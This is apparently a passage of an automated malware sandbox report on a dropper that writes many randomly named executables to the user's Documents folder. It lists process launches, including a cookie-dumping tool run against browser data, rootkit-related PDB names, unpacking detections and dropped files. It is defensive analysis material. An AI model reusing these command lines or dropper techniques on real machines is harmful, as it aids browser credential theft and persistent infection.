      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\file4.exe 'C:\Program Files (x86)\Company\NewProduct\file4.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jooyu.exe 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\Browzar.exe 'C:\Program Files (x86)\Browzar\Browzar.exe'
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeProcess created: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\user\AppData\Local\Temp\fj4ghga23_fsa.txt
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeProcess created: unknown unknown
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00021401-0000-0000-C000-000000000046}\InProcServer32
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile written: C:\Program Files (x86)\Company\NewProduct\Uninstall.ini
      Source: C:\Program Files (x86)\Browzar\Browzar.exeAutomated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exeAutomated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exeAutomated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exeAutomated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exeAutomated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exeAutomated click: Next
      Source: C:\Program Files (x86)\Browzar\Browzar.exeAutomated click: Next
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeFile opened: C:\Windows\SysWOW64\msftedit.DLL
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Browzar\Browzar.exeWindow detected: Number of UI elements: 28
      Source: C:\Program Files (x86)\Browzar\Browzar.exeWindow detected: Number of UI elements: 28
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: yevbZfdCqR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: yevbZfdCqR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: yevbZfdCqR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: yevbZfdCqR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: yevbZfdCqR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: yevbZfdCqR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: yevbZfdCqR.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: yevbZfdCqR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: c:\Development\Releases\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: M5uLwz0sXvZcR89u_43Nm9v8.exe, 0000000E.00000003.701416962.00000000027B3000.00000004.00000001.sdmp
      Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: _.pdb source: 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: symsrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: UnpackChrome.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000003.731578299.00000000051A0000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: vcruntime140.i386.pdbGCTL source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdb source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: symsrv.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.984582000.00000000040A0000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: <c:\src\ShellRunas\Release\ShellRunas.pdb source: file4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmp
      Source: Binary string: EfiGuardDxe.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: dbghelp.pdbGCTL source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Loader.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: JC:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\sawofasiduboh_85-yehasona\dib.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000000.659045843.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdbn[ source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb, source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: C:\timomamuf\25_t.pdb source: yevbZfdCqR.exe, 00000001.00000003.648989644.0000000005AEF000.00000004.00000001.sdmp, 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000000.656280394.0000000000446000.00000002.00020000.sdmp
      Source: Binary string: \13\TestExeBin\zNoteDebug.pdb source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp
      Source: Binary string: vcruntime140.i386.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: jfiag3g_gg.exe, 00000021.00000002.969839258.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000024.00000002.970581180.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000029.00000002.989528470.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: ^C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: 9.C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Unable to locate the .pdb file in this location source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\pohihusuwunegu\gutuna\vepazipal\bowahifevumu_wosojus yavo.pdb source: yevbZfdCqR.exe, 00000001.00000003.645691149.0000000005C3D000.00000004.00000001.sdmp, MQ5u6_H0cs9EUXsesfNpGUNc.exe, 00000007.00000000.657444831.0000000000434000.00000002.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: The module signature does not match with .pdb signature. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: .pdb.dbg source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: '(EfiGuardDxe.pdbx source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: or you do not have access permission to the .pdb location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\ChromeCookiesView\Release\ChromeCookiesView.pdb source: jfiag3g_gg.exe, 00000017.00000002.728626975.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: yevbZfdCqR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: yevbZfdCqR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: yevbZfdCqR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: yevbZfdCqR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: yevbZfdCqR.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation:

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeUnpacked PE file: 4.2.9PWySv_SmMZ5POEp2PUJ_lbI.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeUnpacked PE file: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeUnpacked PE file: 9.2.ulVElw2mPS2j3QKCM9gOxM3j.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeUnpacked PE file: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;
      Source: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exeUnpacked PE file: 19.2.KyTQCmNmjazMZrvIWzjrSsQG.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeUnpacked PE file: 4.2.9PWySv_SmMZ5POEp2PUJ_lbI.exe.400000.0.unpack
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeUnpacked PE file: 5.2.ZteJ0k9a2sM9jXcC3SndaipD.exe.400000.0.unpack
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeUnpacked PE file: 9.2.ulVElw2mPS2j3QKCM9gOxM3j.exe.400000.0.unpack
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeUnpacked PE file: 11.2.oO2a8x5RXTHKygCXkT7syx3J.exe.400000.0.unpack
      .NET source code contains potential unpacker
      Source: file9[1].exe.1.dr, RpgGameApp/RpgClass.cs.Net Code: ????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.2.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs.Net Code: ????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 8.0.awTgWtFfNpBsevxQFHzT446w.exe.430000.0.unpack, RpgGameApp/RpgClass.cs.Net Code: ????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.0.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs.Net Code: ????k???????q? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.2.gUlDp5No64Xfcgfbo3IlvG0y.exe.c90000.0.unpack, RpgGameApp/RpgClass.cs.Net Code: ????k???????q? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: mozglue[1].dll.5.drStatic PE information: section name: .didat
      Source: mozglue[1].dll.11.drStatic PE information: section name: .didat
      Source: mozglue.dll.11.drStatic PE information: section name: .didat
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0129DD7B push ecx; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0041C40C push cs; iretd
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00423149 push eax; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0041C50E push cs; iretd
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004231C8 push eax; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0040E21D push ecx; ret
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0041C6BE push ebx; ret
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00468239 push ecx; ret
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0046E2B5 push ecx; ret

      Persistence and Installation Behavior:

      barindex
      Drops PE files to the document folder of the user
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeFile created: C:\Users\user\Documents\VlcpVideoV1.0.1\md8_8eus.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\freebl3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\lighteningplayer.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeFile created: C:\Program Files (x86)\Browzar\Browzar.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\mozglue[1].dll
